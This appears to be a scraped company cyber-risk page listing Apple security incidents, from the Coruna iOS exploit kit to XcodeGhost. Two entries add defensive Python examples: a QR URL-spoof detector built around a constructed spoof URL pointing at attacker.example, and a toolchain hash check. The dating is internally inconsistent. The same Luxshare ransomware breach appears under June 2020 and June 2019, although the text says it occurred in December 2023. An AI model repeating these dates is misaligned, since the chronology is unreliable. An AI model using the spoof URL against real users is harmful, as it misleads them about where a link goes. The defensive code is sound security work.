Google’s Threat Intelligence Group revealed that Coruna leverages 23 exploits across five attack chains, targeting iPhones running iOS 13 through 17.2.1 via watering-hole attacks. A single visit to a compromised website can trigger remote code execution, sandbox escape, and kernel compromise, enabling attackers to steal data, spy on victims, and drain cryptocurrency wallets.
Originally deployed in highly targeted operations by an unnamed government client of a commercial surveillance vendor, Coruna was later repurposed by Russian state hackers against Ukrainian users and, subsequently, by a Chinese cybercrime group for financial theft. This progression reflects a common pattern: elite zero-day exploits, once leaked, rapidly enter underground markets as "second-hand" tools.
TechCrunch reported that two former employees of L3Harris’ hacking division, Trenchant, identified Coruna’s artifacts and internal naming conventions, suggesting the toolkit was developed in-house and sold exclusively to the U.S. government and Five Eyes allies. Separately, researchers at iVerify assessed that Coruna was likely built by a U.S. government contractor, though they did not confirm attribution.
The timeline aligns with a 2023 insider theft case involving Peter Williams, Trenchant's former general manager, who was sentenced for stealing and selling eight offensive tools, including some targeting iOS, to the Russian exploit broker Operation Zero for $1.3 million. U.S. prosecutors warned these tools could compromise millions of devices. Operation Zero, now sanctioned by the U.S. Treasury, has ties to Russian intelligence and unauthorized buyers, facilitating Coruna's spread to state-backed hackers and cybercriminals.
Coruna’s codebase also overlaps with exploits used in Operation Triangulation, a 2023 campaign disclosed by Kaspersky that targeted iPhones, including those within Russia. Shared modules such as Photon, Gallium, and Plasma suggest a connection between the two frameworks, reinforcing concerns about the proliferation of high-end iOS exploits.
JUNE 2022
770
Vulnerability
16 Jun 2022 • Apple
Apple
XCSSET macOS Malware Incident
769
CRITICAL-1
APP000022125
In a sophisticated cyber incident, limited attacks involving a new variant of macOS malware, identified as XCSSET, have been reported. Discovered by Microsoft Threat Intelligence, this malware variant has altered Xcode projects and exhibited advanced obfuscation, persistence mechanisms, and infection methods. While initially activated in 2022, the XCSSET threat has continued to evolve, challenging cybersecurity efforts with its enhanced techniques for encoding payloads and making it difficult to trace and understand the intent of obfuscated module names. Persistent attacks have been orchestrated using methods such as 'zshrc' to execute files in new shell sessions and 'dock' to replace legitimate Launchpad apps with malicious ones. The impact of this malware predominantly threatens the security of developers' environments and the integrity of software supply chains, potentially resulting in the compromise of data and the disruption of developer operations.
MAY 2022
781
Breach
01 May 2022 • Apple
Apple
Apple vs. Rivos: Proprietary Information Theft
768
CRITICAL-13
APP12594522
Apple sued Rivos, a startup, for allegedly stealing Apple's sensitive proprietary information through some of Apple's former employees.
The former Apple employees allegedly took gigabytes of sensitive SoC specifications and design files at Rivos's request as part of its recruiting process.
According to reports, the startup intends to design chips that will compete with Apple's.
Apple filed the complaint to recover its trade secrets and protect them from further disclosure.
MARCH 2022
792
Breach
01 Mar 2022 • Apple
Apple
Customer Data Leak via Forged Emergency Data Requests
778
CRITICAL-14
APP024522
Customer data of Apple Inc. and Meta Platforms Inc. was leaked to hackers who impersonated law enforcement officials using forged emergency data requests.
The leaked information included the basic subscriber details, such as a customer’s address, phone number and IP address.
The company soon blocked the known compromised accounts from making requests and worked with law enforcement to respond to incidents involving suspected fraudulent requests.
NOVEMBER 2021
801
Breach
29 Nov 2021 • Apple
Apple Inc.
Apple Inc. Data Breach
787
MEDIUM-14
APP459072525
On February 28, 2022, the Maine Office of the Attorney General reported a data breach involving Apple Inc. that occurred on November 29, 2021, due to insider wrongdoing. The breach affected a total of 12 individuals, including 1 resident, and potentially compromised financial account numbers or credit/debit card numbers in combination with security codes, access codes, passwords, or PINs.
JUNE 2020
810
Ransomware
16 Jun 2020 • Apple
Luxshare and Apple: Hackers threaten to release ‘exact’ details of unreleased Apple products
RansomHub Breach Exposes Apple’s Unreleased Product Designs from Luxshare
774
CRITICAL-36
LUXAPP1769095870
RansomHub Breach Exposes Apple’s Unreleased Product Designs from Luxshare
In December, ransomware group RansomHub infiltrated Luxshare, a key Apple supplier, stealing sensitive CAD drawings, engineering designs, and prototype details for unreleased products, including future iPhones, Apple Watches, AirPods, and Vision Pro models. The attackers are now threatening to leak the data unless a ransom is paid.
The breach, which occurred on December 15, was first disclosed by the hackers on the dark web, who accused Luxshare of concealing the incident. RansomHub claims to possess 2D/3D CAD files, PCB designs, repair processes, shipping timelines, and employee details including names, roles, and email addresses of staff working on confidential projects. A sample of the leaked data, reviewed by Cybernews, appears to confirm the authenticity of the stolen files.
Luxshare, a critical player in Apple’s supply chain since 2020, manufactures iPhones, Apple Watches, AirPods, MacBook accessories, and the Vision Pro. The stolen data includes highly detailed .prt files, which reveal precise dimensions and specifications of prototype components, information that could be invaluable to competitors.
Neither Apple nor Luxshare has publicly acknowledged the breach, but the incident raises concerns about the security of Apple’s tightly guarded product development process ahead of major 2024 launches. The exposure of such sensitive designs could compromise Apple’s competitive edge and supply chain integrity.
JUNE 2019
802
Cyber Attack
16 Jun 2019 • Apple
Apple, Luxshare and Geely: Apple, Nvidia, and Tesla confidential files allegedly exposed in supplier breach
Luxshare Hit by RansomHub Ransomware Attack, Threatening Apple, Nvidia, and LG Data Leaks
798
CRITICAL-4
APPLUXGEE1768835808
Luxshare, a major Apple supplier responsible for assembling iPhones, AirPods, Apple Watches, and Vision Pro devices, has allegedly fallen victim to a ransomware attack by the cybercriminal group RansomHub. The attackers claim to have stolen sensitive data, including confidential project details, product designs, and personal information of employees, threatening to leak it unless a ransom is paid.
The breach, which reportedly occurred in December 2023, includes data spanning 2019 to 2025, such as 3D CAD models, circuit board designs, repair processes, and shipping timelines for Apple and other Luxshare clients. The attackers also allege access to engineering documentation from Nvidia, LG, Tesla, and Geely, raising concerns about corporate espionage and supply chain risks.
RansomHub, a ransomware-as-a-service (RaaS) operation, has been highly active in 2024, targeting nearly 500 victims at a rate of nearly one per day. The group employs remote encryption tools and exploits unprotected systems to evade detection. If confirmed, the breach could allow competitors to reverse-engineer products, manufacture counterfeits, or exploit hardware vulnerabilities in Apple devices.
Luxshare, a Shenzhen-based electronics giant with over 230,000 employees and $37 billion in revenue, plays a critical role in Apple’s supply chain. The leaked data also includes personally identifiable information (PII) of employees, such as names, job titles, and work emails.
As of now, Luxshare, Apple, and Nvidia have not publicly confirmed the breach, though Cybernews researchers believe the leaked samples appear legitimate. The incident underscores the growing threat of supply chain attacks and the potential for ransomware groups to disrupt major tech manufacturers.
MARCH 2018
781
Vulnerability
01 Mar 2018 • Apple
Apple
iOS QR Code Vulnerability
780
MEDIUM-1
APP18399622
A flaw in the then-current version of iOS could fool iPhone users into visiting a malicious website instead of the one they expected.
With iOS 11 Apple added QR code scanning to the built-in Camera app: pointing the camera at a code brings up a notification offering to open its content (such as a URL).
The notification, however, did not present the URL the way Safari resolves it. A crafted QR code could show an innocuous-looking domain such as www.welivesecurity.com in the notification banner yet, once tapped, take the unwitting user to an entirely different URL in Safari. (The example QR code image from the original report is not reproduced here.)
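The mechanism behind this class of bug is a disagreement between two URL parsers: the one that renders the preview and the one that navigates. The following is an added example, not Apple's Camera or Safari code. It models a hypothetical preview parser that splits credentials at the first "@" (an assumption chosen to reproduce the symptom, not Apple's actual implementation), compares it with the standards-following parse in `urllib.parse` (last "@" wins, as in the WHATWG URL parser), and flags scanned URLs that should not be opened silently. The payloads are constructed; `attacker.example` is a placeholder name.

```python
# Added example (not Apple's Camera-app or Safari code): models the display/navigation
# mismatch behind URL-spoofing QR codes and a check that flags such payloads.
from urllib.parse import urlsplit

# Constructed payloads. The spoof embeds a trustworthy-looking name in the userinfo
# component; per the WHATWG URL parser (and RFC 3986 authority syntax) everything
# before the LAST "@" is credentials, so the real host is the final token.
SPOOF_URL = "https://xxx@www.welivesecurity.com:443@attacker.example/"
PLAIN_URL = "https://www.welivesecurity.com/"


def navigated_host(url: str) -> str:
    """Host a standards-following browser actually connects to (last "@" wins)."""
    return urlsplit(url).hostname or ""


def naive_preview_host(url: str) -> str:
    """Hypothetical preview parser (an assumption for illustration, not Apple's
    implementation): drop the scheme, treat text up to the FIRST "@" as
    credentials, then cut at the first ":" or "/". This shortcut is what turns
    the banner into a lie when the URL carries a second "@"."""
    rest = url.split("//", 1)[1] if "//" in url else url
    authority = rest.split("/", 1)[0]
    if "@" in authority:
        authority = authority.split("@", 1)[1]  # first "@": the bug
    return authority.split(":", 1)[0].lower()


def scan_url_verdict(url: str) -> dict:
    """What a scanner should surface before opening a scanned URL."""
    parts = urlsplit(url)
    shown = naive_preview_host(url)
    actual = navigated_host(url)
    verdict = {
        "shown": shown,
        "actual": actual,
        "has_userinfo": "@" in parts.netloc,
        "mismatch": shown != actual,
    }
    # Either condition alone justifies refusing to open without a full-URL prompt:
    # credentials in a consumer QR code are never legitimate, and a banner/host
    # disagreement is the spoof itself.
    verdict["suspicious"] = verdict["has_userinfo"] or verdict["mismatch"]
    return verdict


if __name__ == "__main__":
    for u in (PLAIN_URL, SPOOF_URL):
        print(u, "->", scan_url_verdict(u))
```

The practical rule for any scanner or link-preview feature follows from the mismatch: render the host from the same parser that will perform the navigation, and treat a userinfo component in a scanned URL as a reason to show the full URL rather than a friendly domain.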
SEPTEMBER 2017
830
Ransomware
22 Sep 2017 • Apple
Apple: Some Mac users are getting hit with ransomware -- here's what to do
Mac Users Targeted in iCloud Ransomware Attack
772
CRITICAL-58
APP1778005805
Several Mac users have reported being locked out of their devices after hackers exploited stolen iCloud credentials to remotely activate Find My Mac and demand a $50 Bitcoin ransom. The attacks, first highlighted by MacRumors, involve threat actors using compromised usernames and passwords to lock victims’ computers, displaying a ransom message in chatspeak.
Apple has confirmed the incidents, noting that affected users must visit an Apple Store with proof of identity to regain access. Alternatively, victims face either paying the ransom with no guarantee of recovery or performing a hard reset, which erases all data.
The breach highlights a broader security issue: hackers likely obtained credentials through phishing scams, fake virus alerts, or weak passwords. While Apple has not disclosed the scale of the attacks, the incident underscores vulnerabilities in account security, particularly for users without two-factor authentication (2FA) enabled. Disabling Find My Mac may reduce risk for unaffected users.
MARCH 2016
844
Ransomware
01 Mar 2016 • Apple
Apple
Ransomware Attack on Transmission BitTorrent App
821
CRITICAL-23
APP1120522
Mac users of the open-source Transmission BitTorrent client were hit by a rare macOS ransomware attack spread through a trojanized build of the app.
The attackers compromised the app’s official website to distribute the infected installer; once run, it encrypted victims’ documents and data files.
They demanded a ransom of one bitcoin (approximately $400 at the time) in exchange for decrypting the files.
SEPTEMBER 2015
847
Cyber Attack
01 Sep 2015 • Apple
Apple
XcodeGhost Malware Incident
844
CRITICAL-3
APP12520422
Unauthorized third parties tampered with Apple’s Xcode, the development environment used to build Mac OS X and iOS applications, and redistributed the modified copy on the internet outside Apple’s own distribution channel.
Some developers downloaded that copy, built their apps with it and submitted the apps to the Apple App Store.
Apps built with the tainted toolchain could send details of the user’s iOS device to third parties and attempted to phish for iCloud passwords.
Apple removed the tainted apps and worked with the affected developers to make sure they rebuilt their apps with a genuine copy of Xcode.
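What “using the proper version of Xcode” means operationally is verifying the toolchain before building with it, rather than trusting wherever the download came from. The following is an added example, not Apple’s tooling or guidance: it pins a SHA-256 manifest of a known-good toolchain tree and reports files that were modified, removed or added. The toolchain is a constructed temporary directory with hypothetical paths standing in for a real Xcode install.

```python
# Added example (not Apple's code or guidance): pinned-manifest integrity check for a
# build toolchain, the control that flags an out-of-band, modified compiler install.
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large toolchain binaries are not read at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> dict:
    """Hash every regular file under root, keyed by its POSIX-style relative path.
    In practice the manifest is captured once from a trusted install and kept out
    of band (signed, or in version control), never next to the toolchain itself."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_toolchain(root: Path, pinned: dict) -> dict:
    """Compare the tree at root against the pinned manifest."""
    actual = build_manifest(root)
    result = {
        "modified": sorted(p for p in pinned if p in actual and actual[p] != pinned[p]),
        "missing": sorted(p for p in pinned if p not in actual),
        "unexpected": sorted(p for p in actual if p not in pinned),
    }
    # Only a tree with no findings at all should be allowed to build release code;
    # an "unexpected" file is as serious as a modified one, since a linker picks
    # up whatever the toolchain directories contain.
    result["clean"] = not (result["modified"] or result["missing"] or result["unexpected"])
    return result


def demo() -> dict:
    """Constructed toolchain (hypothetical paths): pin a clean tree, then tamper with
    one binary and drop in an extra object, the shape of a trojanized compiler."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "usr" / "bin").mkdir(parents=True)
        (root / "lib").mkdir()
        (root / "usr" / "bin" / "clang").write_bytes(b"known-good compiler driver")
        (root / "lib" / "libclang.dylib").write_bytes(b"known-good library")
        pinned = build_manifest(root)  # captured from the trusted install

        # Tampering: the driver is altered and an object is added to the tree.
        (root / "usr" / "bin" / "clang").write_bytes(b"compiler driver + injected code")
        (root / "lib" / "injected.o").write_bytes(b"object linked into every build")
        return verify_toolchain(root, pinned)


if __name__ == "__main__":
    print(demo())
```

On macOS the native equivalent is Gatekeeper’s assessment of the bundle signature (`spctl --assess --verbose /Applications/Xcode.app`, which should report an Apple source for a genuine copy); the manifest approach above adds what a signature check does not, namely a record of exactly which files changed, and it works for toolchains that are not code-signed at all.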
Frequently Asked Questions
What is the current A.I Rankiteo Cyber Score for Apple?
What was Apple's A.I Rankiteo Cyber Score in May 2026?
What was Apple's A.I Rankiteo Cyber Score in April 2026?
What was Apple's A.I Rankiteo Cyber Score in March 2026?
What was Apple's A.I Rankiteo Cyber Score in February 2026?
What was Apple's A.I Rankiteo Cyber Score in January 2026?
What was Apple's A.I Rankiteo Cyber Score in December 2025?
What was Apple's A.I Rankiteo Cyber Score in November 2025?
What was Apple's A.I Rankiteo Cyber Score in October 2025?
What was Apple's A.I Rankiteo Cyber Score in September 2025?
What was Apple's A.I Rankiteo Cyber Score in August 2025?
What was Apple's A.I Rankiteo Cyber Score in July 2025?
What is the average per-incident point impact on Apple's A.I Rankiteo Cyber Score over the past 12 months?
Where can I access detailed records of all cyber incidents associated with Apple?
Where can I find a summary of the A.I Rankiteo Risk Scoring methodology?
Where can I view Apple's profile page on Rankiteo?
How accurate is the A.I Rankiteo Risk Scoring methodology?